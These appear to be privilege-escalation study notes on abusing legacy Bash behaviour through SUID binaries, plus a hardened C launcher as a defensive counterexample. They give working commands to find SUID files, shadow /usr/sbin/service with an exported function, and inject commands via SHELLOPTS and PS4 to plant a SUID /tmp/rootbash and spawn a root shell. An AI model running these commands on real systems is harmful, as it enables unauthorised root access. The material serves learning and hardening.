# Abusing Shell Features
## Legacy Bash Versions
In some shells (notably Bash <4.2-048) it is possible to define user functions with an absolute path name.
These functions can be exported so that subprocesses have access to them, and the functions can take precedence over the actual executable being called.
Use the following command to find all the SUID and SGID files:
```bash
$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```
The output shows that the suid-env file executes with root permissions:
![[Pasted image 20220806110434.png]]
Executing the file shows that it appears to attempt to start the apache2 webserver:
![[Pasted image 20220806110529.png]]
Running the strings command against the file shows that it appears to invoke the service command to do this, using an absolute path:
![[Pasted image 20220806110629.png]]
Confirm this using strace:
![[Pasted image 20220806110758.png]]
If the machine is running a version of bash lower than 4.2-048, it allows bash functions to be defined with forward slashes in their names. Such functions then take precedence over any executable with an identical path.
Create a function with /usr/sbin/service as the name and make it execute bash:
```bash
$ function /usr/sbin/service { /bin/bash -p; }
```
Then export the function:
```bash
$ export -f /usr/sbin/service
```
Finally, run the /usr/local/bin/suid-env2 file again, and it will spawn a root shell.
---
## SHELLOPTS
Bash has a debugging mode that can be enabled with the -x command line option, or by setting the SHELLOPTS environment variable to include xtrace.
By default, SHELLOPTS is read-only; however, the env command allows it to be set.
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt before each traced statement. This variable can include an embedded command, which is executed every time the prompt is shown.
If a SUID file runs another program via Bash (e.g. by using system()), these environment variables can be inherited by that shell.
Because the file is SUID, the embedded command then executes with the privileges of the file owner.
In Bash versions 4.4 and above, the PS4 environment variable is not inherited by shells running as root.
In the example below, the machine is running bash version 4.1.5:
![[Pasted image 20220806112450.png]]
Versions of bash lower than 4.4 inherit the PS4 environment variable even when running as root. PS4 is the prompt bash prints before each traced command while debugging mode is on.
Run the vulnerable file in a modified environment where bash's debugging mode is enabled.
```bash
$ env -i SHELLOPTS=xtrace PS4='<test>' /path/to/file
```
Our PS4 value is prepended to each line of trace output. Since this is bash, we can use command substitution to execute a command and display its result:
```bash
$ env -i SHELLOPTS=xtrace PS4='$(whoami)' /path/to/file
```
The 'whoami' command was executed, and it was executed as root:
![[Pasted image 20220806114111.png]]
Using this execution to create a SUID copy of bash (rootbash), we can then spawn a root shell:
```bash
$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash)' /path/to/file
$ /tmp/rootbash -p
```
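Both techniques above depend on the same weakness: a SUID program hands control to a shell (via system()) with the caller's environment intact, so an exported function or a SHELLOPTS/PS4 pair reaches the privileged child. As an added example, not part of these notes, here is a hardened stand-in for a suid-env style launcher written in C: it execs /usr/sbin/service directly, with no shell and with an environment it builds itself. The allow-list of variables and the fixed PATH value are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

extern char **environ;
/* Variables the launcher is willing to hand to its child (assumed allow-list). */
static const char *allowed[] = { "LANG", "TZ", NULL };

/* Copy only allow-listed entries of `in` into `out` behind a fixed PATH; everything
 * else (SHELLOPTS, PS4, exported BASH_FUNC_* definitions, ...) is dropped.
 * Returns the number of entries written, not counting the terminating NULL. */
int build_clean_env(char *const in[], const char *out[], int max)
{
    int n = 0;
    out[n++] = "PATH=/usr/sbin:/usr/bin:/sbin:/bin";
    for (int i = 0; in[i] != NULL && n < max - 1; i++) {
        const char *eq = strchr(in[i], '=');
        if (eq == NULL) continue;
        size_t len = (size_t)(eq - in[i]);
        for (int a = 0; allowed[a] != NULL; a++) {
            if (strlen(allowed[a]) == len && strncmp(in[i], allowed[a], len) == 0) {
                out[n++] = in[i];
                break;
            }
        }
    }
    out[n] = NULL;
    return n;
}

/* Return 1 if the NULL-terminated `env` defines a variable called `name`. */
int env_has(const char *env[], const char *name)
{
    size_t len = strlen(name);
    for (int i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], name, len) == 0 && env[i][len] == '=') return 1;
    return 0;
}

int main(void)
{
    const char *env[8];
    build_clean_env(environ, env, 8);
    /* Absolute path, no shell: a function named /usr/sbin/service cannot shadow
     * it, and PS4 is never expanded because bash is not involved at all. */
    char *const argv[] = { "/usr/sbin/service", "apache2", "start", NULL };
    execve(argv[0], argv, (char *const *)env);
    perror("execve"); /* reached only if the exec itself failed */
    return 1;
}
```

Compare with strace output of the original binary: the hardened launcher shows a single execve of /usr/sbin/service rather than a fork of /bin/sh -c.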